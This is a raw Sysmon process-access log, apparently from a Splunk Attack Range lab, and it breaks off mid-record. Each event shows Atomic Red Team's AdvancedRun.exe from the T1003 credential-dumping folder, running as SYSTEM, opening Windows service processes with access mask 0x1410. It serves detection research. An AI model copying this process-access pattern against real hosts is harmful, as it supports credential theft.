17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 